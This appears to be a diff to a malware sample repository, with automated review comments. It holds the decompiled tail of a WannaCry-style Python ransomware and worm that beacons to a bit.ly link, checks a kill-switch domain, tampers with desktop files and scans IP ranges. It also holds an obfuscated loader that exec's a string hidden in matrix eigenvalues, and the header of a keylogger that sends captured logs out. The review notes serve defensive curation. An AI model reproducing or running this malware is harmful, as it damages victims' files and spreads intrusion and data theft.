satoshi kill switch activates !?! 
' + note = img + '\n\n\n' + choice(bdy) + '\n\n\n' + footer + '\n\n\n' + special + f = open('RTFM.txt', 'a+') + f.write(note) + f.close() + try: + os.startfile('RTFM.txt') + except Exception as e: + print 'Failed to open note {}'.format(e) + + +def check_domz(switch): + try: + socket.gethostbyname(switch) + except socket.gaierror: + return False + + return True + + +def getKey(password): + hasher = SHA256.new(password.encode('utf-8')) + return hasher.digest() + + +def encrypt(key, filename): + chunksize = 65536 + outputFile = '(encrypted)' + filename + filesize = str(os.path.getsize(filename)).zfill(16) + IV = Random.new().read(16) + encryptor = AES.new(key, AES.MODE_CBC, IV) + with open(filename, 'rb') as infile: + with open(outputFile, 'wb') as outfile: + outfile.write(filesize.encode('utf-8')) + outfile.write(IV) + while True: + chunk = infile.read(chunksize) + if len(chunk) == 0: + break + elif len(chunk) % 16 != 0: + chunk += '*(16 \xe2\x80\x93 (len(chunk) % 16))' + outfile.write(encryptor.encrypt(chunk)) + + +def encrypt_files(): + extension = [ + 'WNCRY', 'PCCyborg', 'NEVER', 'GONNA', 'GIVE', 'YOU', 'UP'] + encrypt_key = 'TESTTESTTESTTEST' + os.chdir(expanduser('~\\Desktop')) + files_grabbed = [ glob.glob(e) for e in ['*.txt', '*.doc', '*.png', '*.jpg', '.*rtf'] ] + for files in files_grabbed: + for fil in files: + f1 = open(fil, 'r') + f1.close() + fname = fil + '.' 
+ choice(extension) + f = open(fname, 'a+') + f.write(nyan) + f.close() + + +def self_replicate(): + pass + + +def get_local_ip(): + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect(('1.3.3.7', 1)) + local_ip_address = s.getsockname()[0] + s.close() + return local_ip_address + + +def get_worm_public_target(): + octets = [] + for x in range(4): + octets.append(str(randint(0, 255))) + + return '.'.join(octets) + + +if __name__ == '__main__': + switch = 'iuqerfsodp9ifjaposdfjhgosurijfaewrwergwe' + choice(string.ascii_lowercase) + '.com' + nyan = '\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91
\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91
\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x88\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x84\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x84\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80\xe2\x96\x80
\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x91\xe2\x96\x91\xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\xe2\x96\x91\n' + ET = '\\ NDFWET ' + trigger_SB_IPs = ['13.179.185.111', '13.67.89.198', '52.144.44.134'] + try: + requests.get('https://bit.ly/2Zlmmzb') + except Exception as e: + pass + + try: + res = requests.get('https://blockchain.info/q/addressbalance/19GL2cUrn1Xx8XD6VaL25SYAzQd6qnwVb7') + if int(res.text) > 1000000000: + sys.exit() + except Exception as e: + pass + + if not check_domz(switch): + encrypt_files() + drop_note(nyan) + local_ip = get_local_ip() + ip_parts = local_ip.split('.') + for ip in trigger_SB_IPs: + worm(ip) + + for i in range(1, 255): + ip_parts[3] = str(i) + worm('.'.join(ip_parts)) + + while True: + if not check_domz(switch): + worm(get_worm_target()) + + else: + print 'Hero Detected' +# okay decompiling redkeeper_fixed.pyc \ No newline at end of file 
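Review bot: The file carries what looks like a live AWS credential pair in `aws_access_key_id` / `aws_secret_access_key` at the top of the hunk with no comment on whether it has been reported and revoked; a sample corpus should not ship a possibly valid cloud secret unannotated. Add a header comment stating the credential's status and the hash of the original `.pyc`, e.g. `# sha256: <SHA256_OF_ORIGINAL_PYC>` (placeholder), and record the indicators the code exposes: the `bit.ly` beacon and `blockchain.info` balance query in `__main__`, the kill-switch domain built from `switch`, the `RTFM.txt` note written by `drop_note`, and the outbound port 3389 connections made by `worm` against the `trigger_SB_IPs` list and the local /24. The closing banner names `redkeeper_fixed.pyc`, which suggests the bytecode was altered before decompilation; that is worth stating for anyone comparing this text against an in-the-wild binary.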
diff --git a/Python/Scrypt.7z b/Python/Scrypt.7z new file mode 100644 index 00000000..cd4b3320 Binary files /dev/null and b/Python/Scrypt.7z differ diff --git a/Python/Sin.7z b/Python/Sin.7z new file mode 100644 index 00000000..75212a09 Binary files /dev/null and b/Python/Sin.7z differ diff --git a/Python/Virus.Python.Agent.c b/Python/Virus.Python.Agent.c new file mode 100644 index 00000000..87cfd2f3 --- /dev/null +++ b/Python/Virus.Python.Agent.c 
@@ -0,0 +1,98 @@
+def root3(num):
+ fak1=(-1/2.0)+((3**(1/2.))/2.0)*1j
+ fak2=(-1/2.0)-((3**(1/2.))/2.0)*1j
+ a=num**(1/3.0)
+ b=a*fak1
+ c=a*fak2
+ return([a,b,c])
+
+def getPQ(a,b,c):
+ p = b-((a**2)/3.0)
+ q = c + ((2*(a**3)-9*a*b)/27.0)
+ return([p,q])
+
+def getU(p,q):
+ u3=-(q/2)+((q**2)/4.0 + (p**3)/27)**(1/2.0)
+ return(root3(u3))
+
+def getLambda(a,p,u):
+ if u[0] == 0:
+ L0=u[0] - a/3.0
+ else:
+ L0=u[0] - p/(3.0*u[0]) - a/3.0
+
+ if u[1] == 0:
+ L1=-a/3.0
+ else:
+ L1=u[1] - p/(3.0*u[1]) - a/3.0
+
+ if u[2] == 0:
+ L2=-a/3.0
+ else:
+ L2=u[2] - p/(3.0*u[2]) - a/3.0
+
+ return(L0,L1,L2)
+
+def getABC(mtx):
+ a=-(mtx[0]+mtx[4]+mtx[8])
+ b=mtx[0]*mtx[4]+mtx[0]*mtx[8]+mtx[4]*mtx[8]-mtx[5]*mtx[7]-mtx[1]*mtx[3]-mtx[2]*mtx[6]
+ c=-mtx[0]*mtx[4]*mtx[8]+mtx[0]*mtx[5]*mtx[7]-mtx[1]*mtx[5]*mtx[6]+mtx[1]*mtx[3]*mtx[8]-mtx[2]*mtx[3]*mtx[7]+mtx[2]*mtx[4]*mtx[6]
+ return([a,b,c])
+
+def eigenvalues(mtx):
+ ABC=getABC(mtx)
+ PQ=getPQ(ABC[0],ABC[1],ABC[2])
+ U=getU(PQ[0],PQ[1])
+ L=getLambda(ABC[0],PQ[0],U)
+ return(L)
+
+def getstring(M):
+ str=''
+ for c in range(len(M)):
+ mLD=eigenvalues(M[c])
+ for i in range(len(mLD)+1):
+ for n in range(len(mLD)):
+ if round(mLD[n].imag)==i:
+ str+=chr(int(round(mLD[n].real)))
+ return(str)
+
+M=[]
+M.append([(113.01385812+5.43930508534j),(1.00380746157-8.31965051919j),(0.801104731078+0.936588237838j),(3.54083344964+0.95424311335j),(108.978932614-0.625324609788j),(0.972664728193+3.21561313492j),(-1.96068431273+4.58178510931j),(3.38000675384-5.19874167231j),(109.007209265+1.18601952445j),])
+M.append([(63.0988642714+6.73474244088j),(38.7957438546+7.29183564711j),(34.4164174161-43.9985000655j),(-3.42189631605-2.2839106126j),(113.592704397+4.68789276089j),(3.78797602794+2.84593141297j),(11.8086451552+20.4309988015j),(-3.08750519397-21.3451644199j),(88.308431332-5.42263520176j),])
+M.append([(104.406855517-9.51624929923j),(0.968098716657+10.247486874j),(-10.7284625243-8.95847099578j),(12.9139324019-13.3095003388j),(96.7571541203+10.1186269916j),(7.53204087547-16.3313451185j),(-9.47853339226+0.528078467428j),(6.9494984576+1.54492254096j),(101.835990363+5.39762230766j),]) +M.append([(117.007583423+0.42259290212j),(10.4289001938+0.0037209199438j),(7.38888705374+0.935638896508j),(7.48115014303-3.41289258877j),(109.069280503-0.755948319674j),(3.24478449812-2.16750354816j),(-5.74964216381+9.69321702672j),(-7.26693352937+5.36042347147j),(97.9231360734+6.33335541755j),]) +M.append([(110.186416521-0.282612884393j),(-2.46184250953-5.55813797363j),(4.65778281951-4.75979618248j),(1.2659069035+12.6581511208j),(107.886755805+0.474822088624j),(3.77155367287+6.88744471253j),(-7.42510092378+1.80348448129j),(3.14192118127+4.23989806091j),(97.9268276743+5.80779079577j),]) +M.append([(72.2140022769+61.3183653042j),(-18.8737409148-15.7060435241j),(58.3392636255+30.6485277395j),(-67.1552054341+56.3911897282j),(98.6385647787-16.4179748155j),(56.9733296013+58.133872392j),(45.8159400299-18.7587055968j),(4.2035312554+13.3668119287j),(90.1474329444-38.9003904887j),]) +M.append([(104.049507734+5.75582437702j),(-8.72678394019-5.7668384277j),(-11.0728012113-0.32217237915j),(-6.87057321217+21.3939122634j),(103.760022178-2.99256708802j),(-6.18499776219-12.1551478727j),(-8.55296803681+54.31807084j),(-58.3551932758-7.47435960792j),(39.190470088+3.236742711j),]) +M.append([(76.9430409827-13.830066127j),(25.1319832458+9.77882938313j),(23.6549471992+11.4951304553j),(-3.81624310702-25.6964065375j),(108.730230203+24.1623701839j),(5.05322782415+22.5769539708j),(-39.5767673149+3.75005714549j),(33.4962700542-11.2140580554j),(135.326728814-4.33230405689j),]) 
+M.append([(65.3705381002+24.3275637724j),(-23.2408507633-33.1948135285j),(-44.3749218976-10.1563451877j),(30.8389091728+74.8930292425j),(41.3652574764+15.0556813223j),(-36.9319552246+53.5371650042j),(-24.3971696191-65.7465103691j),(47.0569815727+0.905906700125j),(136.264204423-33.3832450947j),]) +M.append([(103.879170415-6.73853523077j),(-20.1941478753-16.2138368074j),(1.27422168444+35.9444148563j),(-3.28016774977+2.63824729836j),(104.873906957+14.1425509676j),(14.7081936915-15.7091034424j),(1.23585470553+0.462230318846j),(3.99583062229+0.00177486657705j),(104.246922628-1.40401573681j),]) +M.append([(109.670502533+0.403141520484j),(7.62437688862-0.469520922423j),(-3.8130361216-0.375627871282j),(14.0602377266+3.46852117946j),(92.5012496763+2.28293319899j),(2.21516616594-3.96314049044j),(1.15517757889+16.0475697982j),(-14.3244254327-19.1761387797j),(119.82824779+3.31392528053j),]) +M.append([(103.630364939+4.54863042641j),(7.34206767122+2.30334575024j),(3.93792103721-1.42468650631j),(5.28646514805-8.78486038728j),(98.758713343+3.91722107348j),(-5.40281247446+4.3533159006j),(14.5436715774+5.03112629715j),(-8.19448665625-12.6529950692j),(97.6109217181-2.46585149989j),]) +M.append([(104.391701773-1.28789346598j),(0.228987611687+5.26905457024j),(-1.3673287265-2.9154578731j),(-5.19199921432-5.86731771378j),(107.927827685+4.0817978047j),(5.19694717434-2.72187536151j),(-3.43168840953-7.95022707391j),(6.04669461661+4.18498345448j),(108.680470541+3.20609566129j),]) +M.append([(88.1645520027+10.9191618534j),(9.74598033305+18.068953036j),(-0.113455388879-5.11740033423j),(-34.909679646-39.8975995576j),(43.7694619926-2.4494446771j),(-12.7606575537-15.2531928161j),(-8.99329464816-45.2183653921j),(-56.5464769405-7.27118850532j),(111.065986005-2.46971717635j),]) 
+M.append([(87.8436008855+37.2629509457j),(-51.9477703666-28.3330817872j),(-20.1947489139-12.0838625073j),(-15.6555897585+36.5732828063j),(47.3314962468-32.3154414398j),(-21.1146466098-12.552594695j),(0.498644271988+5.19403644322j),(-9.1206559221-3.17935277945j),(95.8249028677+1.05249049408j),]) +M.append([(111.146805692+4.22816251299j),(2.00324359806+10.5843665889j),(-2.76026670136+5.20361787029j),(-0.985087506932-1.29558792278j),(97.2988804122+4.77489490019j),(-2.81701992434-5.43193976106j),(4.97185962129-5.27998630615j),(-1.43241652008-10.0386034583j),(117.554313896-3.00305741318j),]) +M.append([(-21.059624269+69.4352827883j),(47.7772465004-121.415108205j),(120.935434939-10.9319876972j),(2.32311751035+7.32736096727j),(93.8129822074-6.8056664753j),(0.0754000989682-4.74426213079j),(-48.3307205418+97.4666346448j),(-20.0521590244-119.910441446j),(173.246642062-56.629616313j),]) +M.append([(94.7688077375+18.270605105j),(-50.3580988311-8.3225498517j),(30.4393219197+24.5256489646j),(-6.85270305911+5.89181789918j),(82.1382476449-5.73463476433j),(4.80123601494+10.7017896355j),(6.61864679123-4.83167627161j),(13.778199697+8.88223295844j),(98.0929446176-6.53597034071j),]) +M.append([(223.253418937+5.95739588995j),(-77.8544386917+92.0828034681j),(-66.0443657955-165.557230081j),(20.0015446384+12.4300989707j),(73.3785528053+6.58501047921j),(4.85014684391-40.1196037084j),(43.2420823142-86.4244985314j),(35.1454404794+94.4180400311j),(-44.6319717425-6.54240636915j),]) +M.append([(41.0142081682+23.2692063962j),(-10.6086219501+12.7493725956j),(-46.7302597052+49.2056004608j),(51.637072693-8.01584922166j),(110.718041509-6.48634894989j),(46.8309243128-32.6164121693j),(-12.3478982429-19.6604596911j),(-6.48744349525-3.43877091281j),(81.2677503229-10.7828574463j),]) 
+M.append([(109.877621466+12.9575670925j),(-0.778140589321+10.5307376923j),(13.6006972337-3.82251684732j),(-1.48970463341-8.29533978213j),(102.357458012-1.86290951708j),(-5.23584582302-2.25840002211j),(7.6099988791-4.90702093254j),(5.7456354155-0.0460450739799j),(99.7649205225-5.0946575754j),]) +M.append([(94.7045035062-25.6229683407j),(-18.2391253369+22.7937631609j),(-29.0905604048-7.19037097502j),(-23.0583403669-39.2866397524j),(84.4266794832+39.7464274999j),(-46.0279000559-20.4386101794j),(-20.7027086938-29.2221245384j),(-18.6498115923+31.300573431j),(76.8688170106-8.1234591592j),]) +M.append([(105.670108346-3.91057638934j),(-3.64697546254+1.44567755708j),(-3.71735073048-12.7439262806j),(-7.99274261168+0.34948217567j),(109.08995481+3.47786624051j),(-10.2704859141+6.0654065736j),(-0.194287756539+3.86197876037j),(-1.44643001225-2.3985124903j),(102.239936845+6.43271014883j),]) +M.append([(122.580470378-14.4341507316j),(-27.9438628782+10.3163428973j),(-15.959467946-25.3057176316j),(31.5540729618-32.8694065023j),(46.8175228377-21.2447861623j),(6.09279603678-75.1153578148j),(-22.2133570254+12.3894404294j),(34.6467245111+24.5784878294j),(99.6020067838+41.6789368939j),]) +M.append([(118.85308691+82.9440945768j),(-36.7483143231+71.5868022216j),(-14.0602241989+48.8832603538j),(-132.891784217-67.3064515175j),(33.3702442097-118.126219615j),(-62.7605460516-60.0857139837j),(12.2710245926+63.6543411513j),(-20.456384219+60.6722531119j),(107.77666888+41.1821250382j),]) +M.append([(106.436935258+0.928988682079j),(3.93779429639+6.68647382008j),(-0.0389643589009+10.2941097267j),(2.02626855767+0.877555321617j),(99.4113275962+4.72209193461j),(-3.18653446253+4.32872182213j),(-0.943084208786-6.41108105498j),(2.98095284974-3.31170222485j),(105.151737146+0.348919383309j),]) 
+M.append([(89.8393869858+35.1156535265j),(-108.098660853-84.0641370429j),(-93.5592844814-144.096505433j),(-1.52256241496+37.1313230361j),(-62.3311003044-67.6198151922j),(-149.146935766-152.098017315j),(-11.6934149927-25.8642378853j),(102.202629088+0.396174315178j),(221.491713319+38.5041616656j),]) +M.append([(184.999581386-303.410690053j),(218.314145844-155.474761163j),(262.880172627+230.115099676j),(-538.767619748-98.455473687j),(-203.66848676-357.747658577j),(359.059170049-493.880837704j),(469.81304818-382.628798149j),(531.60552896+5.35571698513j),(261.668905373+667.15834863j),]) +M.append([(124.484426976-4.79265261306j),(-1.90039577969+15.2806731306j),(-18.7190751541+1.5572252021j),(27.8626383998+26.0405223995j),(79.3599559898+13.1200825749j),(-18.4075679284-18.5560150143j),(-12.4597152173+7.93055072715j),(-2.36047405658-8.7957114854j),(108.155617034-2.32742996182j),]) +M.append([(92.6459559853-1.61276841314j),(-2.0775597689+6.17372014973j),(1.58885077997+44.1526032096j),(-10.0586572313-15.3981052444j),(102.608682641+6.90841217943j),(-28.4935227638+37.3104003402j),(0.952674935262+1.69014692933j),(0.176304072703+1.37540601544j),(115.745361374+0.704356233709j),]) +M.append([(110.352225966+15.0065645213j),(1.42965534543-13.4014323936j),(-10.7448834991+0.0219689393547j),(57.5347841678-26.5000549214j),(55.3558840653-19.5118382831j),(-15.349876293+32.2392737263j),(-13.599951644-29.5406287949j),(-11.8306821749+21.3907330347j),(114.291889969+10.5052737619j),]) +M.append([(127.619853945+6.41616340126j),(3.62478727278-7.68008027677j),(0.124935166111-11.0775400641j),(-2.76561151013-15.0636851946j),(101.573759382+1.49058531598j),(-7.1698539994+3.47262961061j),(5.56386532794+0.856124995439j),(0.556465885654-2.13151008852j),(107.806386673-1.90674871724j),]) 
+M.append([(129.375564736-27.6356017879j),(130.633802405+16.6327156314j),(63.9163645123-80.5372989939j),(5.30892321897+13.7359651655j),(64.8038754853+38.8830235124j),(3.09452345512+35.5540061223j),(-17.5222898492-0.775799027654j),(-33.6207752829-55.6332905587j),(48.8205597791-5.24742172451j),]) +M.append([(128.165629995+46.851034685j),(-43.5399488716+50.0747581674j),(-46.0582844675-16.3828631231j),(-29.8868468217+65.6767553681j),(12.9446164156-2.75648494841j),(-26.6597116882-79.7372322933j),(-16.5963386111+31.3463623124j),(-47.430583864-6.87775041003j),(100.889753589-38.0945497366j),]) +M.append([(107.475753937-8.73914157279j),(-14.7370476469-12.2953925586j),(-9.0605469686-11.6014273048j),(6.78665637989-45.7250245438j),(57.0367272907-30.8464281211j),(-15.8499229947-40.2424461761j),(-49.7238750637+31.9402101387j),(6.57848208777+65.6049084414j),(77.4875187726+45.5855696939j),]) +M.append([(115.100711527+2.07929665225j),(0.41771554184-0.785257450021j),(-0.0371116950126+0.0181246287347j),(2.06862780962+1.08414962847j),(114.922123142+1.20839044412j),(0.802727678553+1.91427683396j),(0.494766249983+0.00450813801499j),(0.101233800608+0.6116084733j),(116.977165331+2.71231290364j),]) +M.append([(118.758300393-38.713436278j),(-100.033551513-21.6515062627j),(99.6928681056-5.4765076885j),(41.4635727201-48.9116687864j),(-28.8384928343+13.0342444563j),(65.3947415069-23.7200622778j),(54.9240245771+4.62648931131j),(-46.411851834-46.1306247796j),(96.0801924414+31.6791918218j),]) +myMTXcode=getstring(M) +exec(myMTXcode) diff --git a/Python/xenotix.py b/Python/xenotix.py new file mode 100644 index 00000000..933603a1 --- /dev/null +++ b/Python/xenotix.py 
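Review bot: This file is committed as plain, runnable Python while the other samples added in the same commit (`Python/Scrypt.7z`, `Python/Sin.7z`) are stored as `.7z` archives; the same inconsistency applies to `Python/xenotix.py`, `Ruby/Constructor.Ruby.Qtp.a` and `Ruby/Trojan-Spy.Ruby.Kakkeys.d` further down. A plain sample is flagged by endpoint AV on every clone and can be executed by accident, so the corpus convention of archiving live samples should be kept for these files too, with the archive's hash recorded alongside. For this file in particular the last line, `exec(myMTXcode)`, runs whatever `getstring(M)` decodes from the complex matrices above, and the decoded text itself is nowhere in the diff; an analyst who needs the second stage should swap that line for `print(repr(myMTXcode))` in an isolated environment rather than run the file as committed. A one-line header comment stating that the matrices are an obfuscation layer for an exec'd string would save the next reader from having to work that out from the eigenvalue code.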
@@ -0,0 +1,210 @@
+'''
+Xenotix Python Keylogger for Windows
+====================================
+Coded By: Ajin Abraham <ajin25@gmail.com>
+Website: http://opensecurity.in/xenotix-python-keylogger-for-windows/
+GitHub: https://github.com/ajinabraham/Xenotix-Python-Keylogger
+
+FEATURES
+========
+1.STORE LOGS LOCALLY
+2.SEND LOGS TO GOOGLE FORMS
+3.SEND LOGS TO EMAIL
+4.SEND LOGS TO FTP
+
+MINIMUM REQUIREMENTS
+===================
+Python 2.7: http://www.python.org/getit/
+pyHook Module: http://sourceforge.net/projects/pyhook/
+pyrhoncom Module: http://sourceforge.net/projects/pywin32/
+
+pyHook Module -
+Unofficial Windows Binaries for Python Extension Packages: http://www.lfd.uci.edu/~gohlke/pythonlibs/
+
+
+NOTE: YOU ARE FREE TO COPY,MODIFY,REUSE THE SOURCE CODE FOR EDUCATIONAL PURPOSE ONLY.
+'''
+try:
